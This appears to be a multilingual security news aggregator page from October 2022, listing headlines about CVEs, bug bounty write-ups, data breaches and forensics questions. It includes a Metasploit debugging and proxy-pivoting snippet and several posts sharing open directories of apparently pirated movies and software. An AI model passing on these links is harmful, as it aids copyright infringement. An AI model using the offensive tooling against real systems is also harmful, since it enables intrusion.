    英特尔确认Alder Lake BIOS源代码已泄露
    英特尔已向知名硬件网站Tom's Hardware确认其第十二代酷睿处理器Alder Lake 的UEFI BIOS 源代码已泄露。
    十大 CICD 安全风险(一)
    CI/CD 环境、流程和系统是现代软件组织的核心。他们将代码从开发工程师的工作站传递到生产环境。结合 DevOps 和微服务架构的兴起,CI/CD 系统和流程重塑了工程生态系统:技术堆栈更加多样化,无论是编码语言,还是流水线中进一步采用的技术和框架(例如 GitOps,K8s)。采用新的语言和框架的速度越来越快,没有重大的技术障碍。自动化和基础设施即代码(IaC)实践的使用有所增加。第三方,无论是
    三城联动,四大特色 | CIS 2022大会各地观众限量报名开启
    11月16日,上海不见不散!
  • Open

    Metasploit에서 HTTP Debug 하기
    MSF를 사용하다 보면 실제로 공격 페이로드가 잘 전송되었는지 확인하고 싶을 때가 있습니다. 또 모듈을 이용해서 테스트했지만 개발자 등이 이해하기 쉽게 HTTP 요청으로 보여줘야할 때도 종종 생깁니다. 오늘은 이와 같이 Metasploit 모듈 테스트 중 HTTP 디버깅이 필요한 경우 사용할 수 있는 방법들에 대해 이야기하려고 합니다. HttpTrace HttpTrace는 MSF 모듈 중 HTTP 관련 모듈이 가지고 있는 기본 옵션 중 하나로 HTTP를 사용하는 모듈에서 지원하는 설정 값들을 확인해보면 HttpTrace가 있는 것을 볼 수 있습니다. set 으로 설정 가능한 값들을 볼 수 있어요 😃 먼저 간단하게 테스트하기 위해 scanner/http/title 모듈로 진행해보겠습니다. HTTPTrace를 따로 true로 설정한게 아니라면 아래와 같이 모듈 작성자가 의도한 결과만 노출됩니다. 여기서 HTTPTrace를 true로 주게 되면 Module 실행 시 HTTP Req/Res를 볼 수 있게 됩니다. set HttpTrace true HeadersOnly 만약 헤더 정보만 필요하다면 HttpTraceHeadersOnly 설정을 추가로 주어 헤더만 볼 수도 있습니다. set HttpTraceHeadersOnly true Interact Burp/ZAP 아래 두 설정을 사용하면 Metasploit 모듈에서 발생하는 Request가 Proxy를 경유하도록 할 수 있습니다. set PROXIES HTTP:127.0.0.1:8090 set ReverseAllowProxy true # 사실 위 두 옵션은 Pivoting 시 MSF가 원할하게 통신할 수 있도록 # 터널링하는데 많이 사용하긴 합니다 (Proxy Pivoting). # 다만 디버깅 때에도 충분히 쓸 수 있습니다 :D Modify HTTP 각 모듈에서 전송하는 HTTP 요청 시 우리가 원하는 형태로 수정하여 전송하게 할 수도 있습니다. HTTP* 관련...

  • Open

    Announcing the Big Bug Bounty by Thunder Farms | Earn up to $200
    Do you like to pick out flaws and brag about them? This time, you can even get paid for it! Sounds great? Of course, it does. Continue reading on Medium »
    Accidental Account takeover
    Hello Security Community, Continue reading on InfoSec Write-ups »
    Everything About Path Traversal Vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    EXPLOITING OS COMMAND INJECTION VULNERABILITIES
    Hi! My name is Hashar Mujahid. And today we are going to learn what OS command injections are and how we can exploit them. Continue reading on InfoSec Write-ups »
    OverTheWire : Natas (Level 0–10)
    This is a fairly interesting collection of challenges that helps to get an idea of Web Security. Continue reading on System Weakness »
    Sql Injection for Beginners using Sqlmap
    Hello Learners, so let’s start with my first blog it is just based on a topic you already knew SQL injection before that let me just… Continue reading on Medium »
    Come guadagnare con i bug informatici?
    In questo articolo vedremo come ho guadagnato il mio bounty più alto e quale è stata la vulnerabilità che mi ha permesso di guadagnare… Continue reading on Medium »
    How Machine Learning Aids in Creating Secure Systems
    It may be a surprise for some to know that machine learning is used in cybersecurity, but there are many ways in which Machine Learning in… Continue reading on Medium »
    Fuzzing for Bug Bounty Hunting
    Testing for vulnerabilities by feeding input one by one manually can be hectic. Continue reading on Medium »
  • Open

    Anyone posted this...
    Marked it as nsfw because not been through it all... Link... submitted by /u/xanderTgreat [link] [comments]
    Some TV and many movies http
    submitted by /u/littlepreptalk [link] [comments]
    Photos from Yakutsk. Includes Russian mining wizards.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Review Webinar Visualisasi dan Analisis Data untuk Investigasi Kejahatan Siber
    Pada ruang siber di Indonesia, terdapat banyak komponen layaknya ruang siber pada negara lainnya. Tentunya dengan adanya ruang siber… Continue reading on Medium »
    SPY NEWS: 2022 — Week 40
    Summary of the espionage-related news stories for the Week 40 (October 2–8) of 2022. Continue reading on Medium »
    Pyramid Of Pain TryHackMe
    Hash Values (Trivial) Continue reading on Medium »
  • Open

    SecWiki News 2022-10-09 Review
    恶意 Tor 浏览器安装程序正通过 YouTube 进行分发 by Avenger 某云-WAF挑战赛wp by ourren OrcaC2: 一款基于Websocket加密通信的多功能C&C框架 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-09 Review
    恶意 Tor 浏览器安装程序正通过 YouTube 进行分发 by Avenger 某云-WAF挑战赛wp by ourren OrcaC2: 一款基于Websocket加密通信的多功能C&C框架 by ourren 更多最新文章,请访问SecWiki
  • Open

    Everything About Path Traversal Vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    Finding of Directory/Path in Linux
    No content preview
    njRAT Malware Analysis
    No content preview
    Browser in the Browser Attack
    No content preview
    CVE-2022–40684: New Authentication Bypass Affecting FortiGate and FortiProxy
    No content preview
    Best CTF Platforms
    I have compiled a list of Red Team/Blue Team Capture The Flag Platforms to test your skills on. Continue reading on InfoSec Write-ups »
    Full Company Building Takeover
    No content preview
    EXPLOITING OS COMMAND INJECTION VULNERABILITIES
    No content preview
  • Open

    Everything About Path Traversal Vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    Finding of Directory/Path in Linux
    No content preview
    njRAT Malware Analysis
    No content preview
    Browser in the Browser Attack
    No content preview
    CVE-2022–40684: New Authentication Bypass Affecting FortiGate and FortiProxy
    No content preview
    Best CTF Platforms
    I have compiled a list of Red Team/Blue Team Capture The Flag Platforms to test your skills on. Continue reading on InfoSec Write-ups »
    Full Company Building Takeover
    No content preview
    EXPLOITING OS COMMAND INJECTION VULNERABILITIES
    No content preview
  • Open

    Everything About Path Traversal Vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    Finding of Directory/Path in Linux
    No content preview
    njRAT Malware Analysis
    No content preview
    Browser in the Browser Attack
    No content preview
    CVE-2022–40684: New Authentication Bypass Affecting FortiGate and FortiProxy
    No content preview
    Best CTF Platforms
    I have compiled a list of Red Team/Blue Team Capture The Flag Platforms to test your skills on. Continue reading on InfoSec Write-ups »
    Full Company Building Takeover
    No content preview
    EXPLOITING OS COMMAND INJECTION VULNERABILITIES
    No content preview
  • Open

    Getting served a malicious update - interesting techniques, my slip up, and lessons learned: a short blog post
    submitted by /u/CuckooExe [link] [comments]
  • Open

    某集团渗透实战
    从官网获取信息开始渗透,以洞打洞,获取权限一步到位。
    企业供应链安全的思考与实践(二) 第三方技术管理与软件供应链框架
    第三方技术指的是围绕技术引用和实现的技术工具、接口和组件,由于更偏向技术应用,因此往往不在企业的采购清单和计划中。
    FreeBuf早报 | 宜家智能照明系统存缺陷;英特尔第12代处理器源码遭泄露
    攻击者只需一个畸形的 Zigbee 框架,就可控制某些宜家智能照明设备,使用户无法关灯。
    初探Spring内存马之Controller(内存马系列篇九)
    Spring框架内存马在Controller层下的内存马实现
    RSAC2022议题分享:OT逆向工程
    OT技术(OT)是一类硬件和软件,用于监控和控制物理设备的性能,主要运用于制造业、运输业和公众服务业等一系列的工业控制系统中。
    芯片制造商 ADATA(威刚)否认遭到 RansomHouse 组织攻击
    中国台湾芯片制造商 ADATA(威刚)否认近期遭到来自 RansomHouse 组织的网络攻击。
    《信息安全技术 软件供应链安全要求》(征求意见稿)发布
    《安全要求》给出了软件供应链安全保护目标,规定了软件供应链组织管理和供应活动管理的安全要求。
    400万条2K Games用户数据正在暗网上出售
    在黑客论坛上,2K的游戏支持数据库已被挂出进行销售,包括用户 id、用户名、电子邮件、真实姓名等信息,总计达到400万条。
  • Open

    Email Address Exposure via Gratipay Migration Tool
    Liberapay disclosed a bug submitted by suprnova: https://hackerone.com/reports/1727044 - Bounty: $100
    Relative Path Traversal vulnerability in fabric-private-chaincode
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1690377
  • Open

    What does this IP camera review mean for your security?
    Hi, im considering this FOSCAM d4z IP cam but this worries me: When I bought this IP camera, I was looking forward to a high quality device, with a strong and experienced brand backing it. Turns out that I was wrong: while the hardware is impeccable (very good quality build), the software is outrageous. In order to access this IP Camera's web UI you have to: 1. be running a Windows/Mac OS (no Linux/BSD! Sorry, all the network people out there!) 2. install a software that the IP Camera downloads from S3 3. Said software installs a background service on your Windows (that's where I tried it) system, opening a websocket server listening for port 50000 and 6129 (wow, really?) 4. Once your "malware" is running locally, you can finally log into your webcam, if that doesn't cause your entire host system to reboot (does so for me on two different machines) So in practice: 1. The IP Camera does not function as an IP Camera 2. The "IP Camera" leads to Windows crashes 3. The "IP Camera" is a security threat from day 1 I am waiting to talk to Foscam support to understand if this is something they can fix (by giving me a firmware that is not intrusive), or if I should just ship it back and mark the company as untrustworthy submitted by /u/chipolatavanmona [link] [comments]
    Does anyone know any good tools or practices to test for virus and/or malware in csv files that will be stored into our internal storage?
    Storage in the cloud submitted by /u/herbertisthefuture [link] [comments]
  • Open

    CVE-2022-41343: Remote Code Execuion in Dompdf library via Phar deserialization
    Article URL: https://tantosec.com/blog/cve-2022-41343/ Comments URL: https://news.ycombinator.com/item?id=33138839 Points: 1 # Comments: 0
  • Open

    Fuzzing for Bug Bounty Hunting
    Testing for vulnerabilities by feeding input one by one manually can be hectic. Continue reading on Medium »
  • Open

    Fuzzing for Bug Bounty Hunting
    Testing for vulnerabilities by feeding input one by one manually can be hectic. Continue reading on Medium »
  • Open

    A career in Digital Forensics
    Hey all - just querying what a career in the Digital Forensics space may look like and if there’s any potential for career progression and the ability to earn more money as a persons experience increases. I know there’s ample work within the government and law enforcement area, but is there more opportunity in the private sector? Currently, I’m attempting to gain employment with a LEA, learn as much as I can and do courses, and potentially move into the private sector in 10-15 years time. I have previously (and very limited) worked in a role where I used Cellbrite, XRY and a few other tools. I’m hoping to hear about peoples experiences in these type of roles, and if it’s ‘worth it’. Thank you. submitted by /u/OkGrape5530 [link] [comments]

  • Open

    github.com/s0rg/crawley
    crawley project: https://github.com/s0rg/crawley just released v1.5.0: https://github.com/s0rg/crawley/releases/tag/v1.5.0 new features: js endpoints parser proxy auth crawl ignore list submitted by /u/Swimming-Medicine-67 [link] [comments]
    Google Drive TV Shows
    TV Shows Anime Grab it while it lasts, cheers submitted by /u/blinkydonut [link] [comments]
    Harry Potter, Pirates of Caribbean, Assassin's Creed and some other movies
    Link:- http://167.114.174.132:9092/movies/batch225/ Directory of Harry Potter, Pirates of Caribbean, Assassin's Creed and some other movies, with okayish download speed https://preview.redd.it/7j9zerzzxjs91.png?width=1920&format=png&auto=webp&s=62467bfe6753796a8e3a20bd11a8d3bba760d954 submitted by /u/narayan9deep [link] [comments]
    Movies, 1-2gb file size, good speeds. English, no subs.
    submitted by /u/draebor [link] [comments]
    Many PDFs
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Belkasoft Evidence Center - Can't create new case, database mismatch
    Hey all- Trying to open a new case in Belkasoft Evidence Center (BEC), and when attempting to do so, I'm getting the error- "Database version mismatch", saying the case I'm opening is created with an older version of Evidence Center. Can anyone offer me some guidance to remedy this? submitted by /u/thenyx [link] [comments]
    Need Guidance!
    So I’m currently working towards my B.S. in Cyber Security and have roughly 1 year and 5 months left. I also just got hired on as a intern for help desk throughout the local school districts. This will help me of course to learn the basics and to get my foot in the door of the I.T. world. My schooling will cover around 11 certifications but I know hands on experience is always at the top for landing a job. I’ve been researching a lot into computer forensics and would like to make this my permanent career. What steps would you recommend I take first? I was given some great books to get started on reading. Should I also go for the CFCE or GCFE? I know both certs take a lot of knowledge, time, and prerequisites to obtain. I was thinking I could accomplish these things during my schooling timeframe and then attempt to apply after graduating and hopefully by then I will have some time in help desk which is still some form of experience. I would like to work for the government on criminal cases to be exact. What are your thoughts based off my current plan and progression? I don’t know anyone personally in the I.T. field so any advice is definitely needed and appreciated! submitted by /u/matty0100 [link] [comments]
  • Open

    Snapchat data access?
    Hey there, I’ve got a question I’m trying to find some clarity with in relation to snapchat. Whilst photo and text messages are usually deleted instantly on the app, it’s clear that snapchat can use the data obtained from these messages to ‘improve their services’ and provide such data to their service partners Therefore, if you were to send compromising NSFW content via photo or text message on snapchat, would they have the right to sell that content on? Whilst I’m doubtful that they would, considering this would mean billions of personal ‘snaps’ being sold, im worried about the internal security of snapchat in relation to these matters and was looking for clarity If I was to send such content to an individual, and provided neither of us saved the content, what would be the potential ramifications of this? I’m a layman to these issues and have myself shared content I’d rather not have on Snapchat in earlier years, and have been worried with the idea that such content is circulating after being sold or shared by Snapchat. Therefore, I’d just like to ask what is the realistic likelihood that this is the case? Thank you for your time submitted by /u/ApexUnited123 [link] [comments]
    Any familiarity with MGLNDD Scans From across the internet
    Looked through my server logs and i saw a MGLNDD_"IP Address"_"Port number"\n Are they used for malicious intent or reconnaissance submitted by /u/ZCB_Khaos [link] [comments]
  • Open

    Beginner’s guide to start with OSINT
    OSINT is something one can get into irrespective of the fact that you know other aspects of hacking or not. Whether you have a working… Continue reading on Medium »
    Geolocating conflicts in Fall 2022 with various methods, and a preview of the new tool Atlos
    Image by Ingo Joseph, Pexels.com Continue reading on Medium »
  • Open

    SecWiki News 2022-10-08 Review
    网络空间战略预警体系的建设思考 by ourren 云原生安全系列(一) | Kubernetes云原生靶场搭建 by tinyfisher Thinkphp5.1应用初探 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-08 Review
    网络空间战略预警体系的建设思考 by ourren 云原生安全系列(一) | Kubernetes云原生靶场搭建 by tinyfisher Thinkphp5.1应用初探 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    What can we learn from leaked Insyde's BIOS for Intel Alder Lake
    submitted by /u/hardenedvault [link] [comments]
  • Open

    【漏洞通报】FortiGate 和 FortiProxy 存在身份验证绕过漏...
    近日,Fortinet修复了一个存在 FortiGate 防火墙和 FortiProxy Web 代理中的身份验证绕过漏洞(CVE-2022-40684),该漏洞可能允许攻击者在易受攻击的设备上执行...
  • Open

    【漏洞通报】FortiGate 和 FortiProxy 存在身份验证绕过漏...
    近日,Fortinet修复了一个存在 FortiGate 防火墙和 FortiProxy Web 代理中的身份验证绕过漏洞(CVE-2022-40684),该漏洞可能允许攻击者在易受攻击的设备上执行...
  • Open

    泄露约30万用户信息,丰田公开道歉
    丰田汽车公司旗下T-Connect服务出现安全事故,近三十万用户的个人信息可能已经被攻击者窃取。
    FreeBuf早报 | LofyGang向开源软件大量投毒;黑客从Binance窃取超过5.7亿美元
    LofyGang 威胁组织正在使用 200 多个恶意 NPM 包和数千个安装程序来窃取信用卡数据、游戏和流媒体帐户,然后在地下黑客论坛中售卖被盗凭据和战利品。
    因滥用 Optus 泄露的数据信息敲诈受害者,19岁少年被捕
    澳大利亚联邦警察(AFP)逮捕了一名来自悉尼的19岁青少年,该少年被指控试图利用上月底 Optus 泄露的数据信息,敲诈受害者。
  • Open

    Cross-Site Scripting Attacks (XSS) And Website Security
    What is a Cross-site scripting attack and how can we secure our website? Continue reading on Medium »

  • Open

    Scanbox Threat Actors Checking for Kaspersky
    Does anyone have any idea why threat actors using Scanbox would run a plug-in that checks specifically for Kaspersky security appliances? All of the intel I have read says Scanbox checks for Kaspersky Internet Security but not really why that is done. Recent campaigns with targets in Australia and Malaysia have been attributed to threat actors associated with China. submitted by /u/Guitarware [link] [comments]
    Is it safe to use a computer potentially infected with a RAT if it is completely disconnected from the internet?
    My grandmother’s computer recently got infected with an RAT (not exactly sure, but it’s better to be safe than sorry), and I’m extremely wary of her powering it on since she doesn’t even know what operating system she has. submitted by /u/Very_Bi_Badger [link] [comments]
    Cybersecurity Department for MSP
    Anyone familiar with starting a cybersecurity department for their IT company or why it would even be needed? And what metrics could be collected to substantiate its existence? submitted by /u/ReturnOpen [link] [comments]
    How to identified the source of bruteforce?
    I have a lot of alerts like below: AV - Alert - "1664927164" --> RID: "18130"; RL: "5"; RG: "windows,win_authentication_failed,"; RC: "Logon Failure - Unknown user or bad password."; USER: "(no user)"; SRCIP: "-"; HOSTNAME: "(dc01) 10.0.0.1->WinEvtLog"; LOCATION: "(dc01) 10.0.0.1->WinEvtLog"; EVENT: "[INIT]2022 Oct 05 07:46:02 WinEvtLog: Security: AUDIT_FAILURE(4625): Microsoft-Windows-Security-Auditing: (no user): no domain: DC01.company.int: An account failed to log on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Type: 3 Account For Which Logon Failed: Security ID: S-1-0-0 Account Name: sam Account Domain: Failure Information: Failure Reason: %%2313 Status: 0xc000006d Sub Status: 0xc0000064 Process Information: Caller Process ID: 0x0 Caller Process Name: - Network Information: Workstation Name: SERVER Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon request fails. It is generated on the computer where access was attempted.[END]"; Well as you can see, there is no useful information to understand from which source - attacker is trying to bruteforce. Network address is empty. I can see the workstation name, but we don't have this workstation in our network, so it's from external. Propably, we have public resource that have integrated AD creds, but I'm not sure. So, how can I find the source? Windows Event log don't have such information. Maybe I need to look to other data sources? Or to configure addtional data sources to see from where attacker is trying bruteforce? Any ideas? I'm stuck on this. submitted by /u/athanielx [link] [comments]
    Is it possible to run multiple VMs in Proxmox, each with different public IPs (through VPN)?
    I'm looking to spin up a few virtual machines in my proxmox environment. Each one would need to have a different public IP address when connecting out to the internet. Is this possible to do on my local network? I imagine I have to use some sort of VPN service for this on each endpoint. ​ On a side note, I'm looking to deploy and configure these VMs using Terraform and Ansible. Any advice with this approach is welcome. ​ Thanks in advance! submitted by /u/BurnerAccountNo2 [link] [comments]
    GIAC Gold certifications going away?
    I just noticed this page was written in the past tense, and saying the gold programme was active until 2022. https://www.giac.org/gold-overview/ But I can't find any more information, any announcement or something. Are they closing this programme? Is there any replacement or is there only one level of certs now? Does it mean you can just take GSE after you get your three GSEC GCIH and GCIA? submitted by /u/ProperWerewolf2 [link] [comments]
  • Open

    Vulnerabilities in Online Payment Systems
    Years ago I was involved in security research and I was a consultant for some tech companies in my country. During that time I found many… Continue reading on Medium »
    Exploiting Broken Access Control Vulnerability
    Access control (or authorization) is the application of constraints on who (or what) can perform attempted actions or access resources… Continue reading on Medium »
    [Writeup] Vault game — Hats Finance CTF#2
    This is my solution for Vault-game from Hats Finance making me one of winners with rewards of 1000 DAI and a NFT. Continue reading on CoinsBench »
    Pico CTF 2021 (Web Exploitation) — Get aHead & Cookies
    GET aHEAD (20 Points) Continue reading on System Weakness »
    Insecure Comments
    Hi All, Continue reading on Medium »
    AMA session recap about the Q Bug Bounty campaign with Immunefi
    On September 28th, we ran our first AMA session in Discord. The topic was our ongoing Bug Bounty program in collaboration with Immunefi… Continue reading on Q Blockchain »
    Command ‘go’ not found
    Hi All, Greetings…!!! Continue reading on Medium »
    Cybersecurity Vs Social Engineering: What’s the Difference?
    Continue reading on Bug Zero »
    Software Development Life Cycle
    What is Software? Continue reading on Bug Zero »
    PSScriptAnalyzer: SAST Tool for PowerShell Script
    PowerShell Script Analyzer, also known as PSScriptAnalyzer, is a static code analysis tool (SAST tool), which examines the PowerShell… Continue reading on Medium »
  • Open

    Review #320: Los Angeles, X
    #320: Los Angeles, X Continue reading on Medium »
  • Open

    Red Team Recon
    Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target. Continue reading on Medium »
  • Open

    Linux Security — LSM (Linux Security Modules)
    submitted by /u/boutnaru [link] [comments]
    Disclosure time for Zoneminder findings
    submitted by /u/trenchesofit [link] [comments]
  • Open

    Tools for DMG creation of Macbook Pro
    Hi there, Likely a very vague and/or stupid question, but I need to create an image of two MacBooks, one an M1, 2020 running 12.3.1 Monterey, and one a MacBook Pro 15 inch, 2018 with a T2 chip. I'm very green to this field, and after some preliminary research, this is clearly not as easy as it initially seemed. I was hoping I might be able to just use a tool like dd to get the dmg images, but it seems like there are quite a few hoops to jump through for T2 and M1 MacBook pros. Just wondering if anyone has any advice regarding tools/processes to just get a DMG image from both these Macs? submitted by /u/Wittinator [link] [comments]
    USB History for Catalina
    I used AXIOM to collect a remote image from a macbook Air. I thought I grabbed all the system files but it's not showing any USB history when the endpoint monitoring tool showed there was activity in the past 6 months. Where is this normally located? submitted by /u/CrazyKitty2016 [link] [comments]
  • Open

    OhSINT
    THM | Writeup Continue reading on Medium »
    OSINT in metaverse
    Metaverse !!! a trending topic right?? before understanding how to perform OSINT in metaverse lets understand what is metaverse !! Continue reading on Medium »
  • Open

    Assorted music, movies, series and software
    Everything is in labelled folders. The software is a few years old. http://167.114.174.132:9092 submitted by /u/D5LR [link] [comments]
  • Open

    SecWiki News 2022-10-07 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-07 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 英国首相个人手机号遭曝光;丰田道歉:约296000条客户信息被泄露
    丰田汽车表示,发现T-Connect服务中296019条客户信息疑遭泄露,包括电子邮件地址和客户号码。
  • Open

    态势感知的前世今生(之一)
    本系列文章将分为几篇介绍一下态势感知的发展历程和行业实践。 起源与定义 态势感知的概念起源于军事理论,早在春秋 … 继续阅读态势感知的前世今生(之一) →
  • Open

    CyRC Vulnerability Advisory: CVE-2022-39064 IKEA TRÅDFRI smart lighting
    Article URL: https://www.synopsys.com/blogs/software-security/cyrc-advisory-ikea-tradfri-smart-lighting/ Comments URL: https://news.ycombinator.com/item?id=33118758 Points: 1 # Comments: 0
  • Open

    CyRC Vulnerability Advisory: CVE-2022-39064 IKEA TRÅDFRI smart lighting
    Article URL: https://www.synopsys.com/blogs/software-security/cyrc-advisory-ikea-tradfri-smart-lighting/ Comments URL: https://news.ycombinator.com/item?id=33118758 Points: 1 # Comments: 0
  • Open

    The Importance of Infrastructure as Code Security Scanning
    No content preview
  • Open

    The Importance of Infrastructure as Code Security Scanning
    No content preview
  • Open

    The Importance of Infrastructure as Code Security Scanning
    No content preview
  • Open

    Speaking Engagements
    Every now and again, I have a need (re: "opportunity") to compile a list of recorded speaking events. The reasons vary...there's a particular message in one or more of the recordings, or someone wants to see/hear what was said, or it's more about showing examples of my presentation style. For the sake of simplicity, I thought I'd just take the list I'd compiled in Notepad++ and create a blog post. Huntress TradeCraft Tuesdays Bang For Your Buck: How Hackers Make Money - Ethan and I discuss various means by which threat actors monetize their activities, which is (in many cases) their ultimate goal. We also present some steps you can take to inhibit or obviate this. Digital Forensics (or Necromancy) - Jamie and I talk about digital forensics with our special guest, Dr. Brian Carrier ResponderCon  Here's a link to my slides; I'll post a link to the recorded talk once it's available. Podcasts I recently participated in the Horangi "Ask A CISO" podcast (link here, and on Spotify). Older Events/Recordings RVASec 2019 presentation Nuix Unscripted A couple of podcasts via OwlTail Down the Security Rabbithole podcast from 2017 A podcast from 2009 CyberSpeak podcast from 2006 (24 Sept, 1 Apr)
  • Open

    [译] 流量控制(TC)五十年:从基于缓冲队列(Queue)到基于时间戳(EDT)的演进(Google, 2018)
    译者序 本文组合翻译了 Google 2018 年两篇分享中的技术部分,二者讲地同一件事情,但层次侧重不同: Netdev 2018: Evolving from AFAP: Teaching NICs about time, 视角更宏观,因果关系和历史演进讲地较好; OCT 2018: From Queues to Earliest Departure Time,更技术和细节一些。 另外翻译过程中适当补充了一些与 Linux/Cilium/BPF 相关的内容。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 网络起源 1.1 技术需求与网络起源 1.2 私有协议和厂商锁定 1.3 早期厂商网络方案的问题 1.4 TCP/IP 协议模型 1.4.1 IP:尽力而为传输(best effort delivery) 1.4.2 TCP:最终可靠传输(eventual delivery) 1.4.3 小结 2 网络传输 2.1 技术需求:越快越好(或尽可能快,AFAP) 2.2 TCP 发送机制:只限制发送多少,未限制发送多快 2.3 基于 queue 做流量整形 2.3.1 流量整形器(shaper)原理:以 token bucket queue 为例 2.3.2 AFAP shaper 历史贡献:支撑 TCP/IP 在过去 25 年速度 10000x 2.3.3 面临的问题:延迟和丢包 2.3.4 缓解/避免丢包的方式(2012 年之前) 2.3 带宽摩尔定律失速(2012 年之后) 3 Google 网络团队的一些创新 3.1 思路转变:从基于 queue 到基于 time 3.2 一些已发表论文 4 从基于队列到基于时间戳:qdisc/EDT 详解 4.1 基于…

  • Open

    What is a Malware Attack?
    A malware attack is the act of injecting malicious software to infiltrate and execute unauthorized commands within a victim’s system without their knowledge or authorization. The objectives of such an attack can vary – from stealing client information to sell as lead sources, obtaining system information for personal gain, bringing a site down to stop business or even just placing the mark of a cyber-criminal on a public domain. Malware attacks have been known to be executed by disgruntled employees, competing businesses, or even cyber-terrorist organizations. Continue reading What is a Malware Attack? at Sucuri Blog.
  • Open

    Securely Implementing IdP-initiated SAML2 Login
    submitted by /u/benarent [link] [comments]
    Unpatched vulnerability on Zimbra (again!) - symlink abuse in cpio
    submitted by /u/iagox86 [link] [comments]
    Uncovering a Fake Recruiter Scam with OSINT techniques
    submitted by /u/smicallef [link] [comments]
    Fully loaded: testing vulnerable PyYAML versions
    submitted by /u/iterablewords [link] [comments]
    CVE-2022–36635 — A SQL Injection in ZKSecurityBio to RCE
    submitted by /u/sp1d3rr [link] [comments]
    Release EMBA firmware analyzer v1.1.2 - Knight Rider Edt.
    submitted by /u/_m-1-k-3_ [link] [comments]
    Comparing Semgrep and CodeQL
    submitted by /u/nibblesec [link] [comments]
    Hidden DNS resolvers and how to compromise your infrastructure Kaminsky style
    submitted by /u/The_Login [link] [comments]
    CVE-2022-41343 - RCE via Phar Deserialisation (Dompdf)
    submitted by /u/Gallus [link] [comments]
    Introducing Campaigns to MITRE ATT&CK
    submitted by /u/CyberMasterV [link] [comments]
    Releasing GitFive - Track down GitHub users by doing advanced investigation (usernames history, names variations, links between multiple identities, and more).
    submitted by /u/mxrchreborn [link] [comments]
    A Deep Dive of CVE-2022–33987 (Got allows a redirect to a UNIX socket)
    submitted by /u/csanders_ [link] [comments]
  • Open

    How I found `CVE-2022–40087`
    Simple College Website 1.0 was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. Continue reading on Medium »
    Cloud Pentesting — AWS penetration testing guide for bugbounty hunters
    Note: before reading this article you need to have basic knowledge about AWS(amazon web services) and it’s basic working mechanism and… Continue reading on Medium »
    Full Company Building Takeover
    Hello everybody, Most of the time you read about account takeover or Infrastructure takeover but did you heard before about Company… Continue reading on Medium »
    Mr. Robot: Self Xss from Informative to high 1200$ ,csrf, open redirect,self xss to stored
    Hello all bug bounty hunters sorry for any mistake if I forget something to use this writeup for your RECON or you’re RESEARCHING, I found… Continue reading on Medium »
    WordPress Security
    Initially started as a blogging platform has turned into a lifesaver for many startups, companies, influencers, and bloggers. WordPress… Continue reading on InfoSec Write-ups »
    Azure Open Container $$$
    A nice story of hunting Continue reading on Medium »
    Error based SQL Injection with WAF bypass manual Exploit 100%
    Hey folks, Back again with SQL injection WAF bypass write-up, I’m gonna share what methodology I used to bypass the WAF block. Continue reading on Medium »
    How to properly enforce authorization
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Open Source Intelligence Tools and Techniques
    Previously, we discussed about open source intelligence (OSINT) and the various information we can gather about people, institutions, and… Continue reading on Medium »
  • Open

    Remote Command Execution via Github import
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1679624 - Bounty: $33510
    SQL Injection through /include/findusers.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081145
    Path Traversal issue at https:///blaze/
    Sony disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1320084
    SSRF on http://www./crossdomain.php via url parameter
    Sony disclosed a bug submitted by n0x496n: https://hackerone.com/reports/971590
    Blind SSRF in social-plugins.line.me
    LINE disclosed a bug submitted by sirleeroyjenkins: https://hackerone.com/reports/833758 - Bounty: $100
  • Open

    AD security audit tools
    Do you know any audit tools like PingCastle? submitted by /u/athanielx [link] [comments]
    As the new guy, how seriously should I be arguing to the rest of the team that having critical databases on the WS/SQL 2008R2 machines is a glaring vulnerability?
    I'm less than a month in at a new job as a networks/system analyst for a city government in California, so I don't want to rock the boat too much. I've previously done system administration, network administration, system engineering, etc. with a broad but shallow knowledge for a few county and state government agencies in a different state, so it's not like I'm learning the entire job from scratch, only the systems and applications unique to $NewJob. Almost all of the systems I'm taking over from the guy retiring in a few months are on 2012R2, fine whatever, it's still supported for another year. Bare minimum is fine with me. However, there's one machine on 2008R2 Enterprise with SQL Server 2008R2SP3 that had its databases migrated and supposedly offlined to an AWS instance six months a…
    What are the current data wiping standards for SSD's
    /r/macsysadmin recommended also asking here. Original post Hey - I work for a relatively young organisation, and we're getting ready for our first major hardware refresh, replacing ageing 2018 MacBook Pro's with M1 Airs. A lot of these Macbook Pro's are still pretty usable (battery health is the main problem, no longer under warranty unfortunately) and it would be super wasteful to have them destroyed/recycled, so we're planning to let our Employee's take ownership of them if they wish (after signing a liability waiver and all that stuff to protect the company should the device burn their house down). What are the current standards for wiping SSD's to ensure no trace of company data remains. All our devices are encrypted via FileVault. I already Wipe the volumes via DiskUtility when a device comes back to me. Is the combination of these two factors sufficient? Any data traces are encrypted and the recovery key wiped... I'm seeing mixed guidance regarding a 1x pass over random bit overwrites, 7x pass (DoD standard) overwrite but I think this is obsolete for SSD's. I believe these can be performed via 'diskutil secureErase' terminal command, but is this still a recommended method? Does anyone vouch for third party hard drive wipe software like BitRaser File Eraser? Apples own guidance for donating or selling on old hardware is just to wipe via DiskUtility, but this probably doesn't 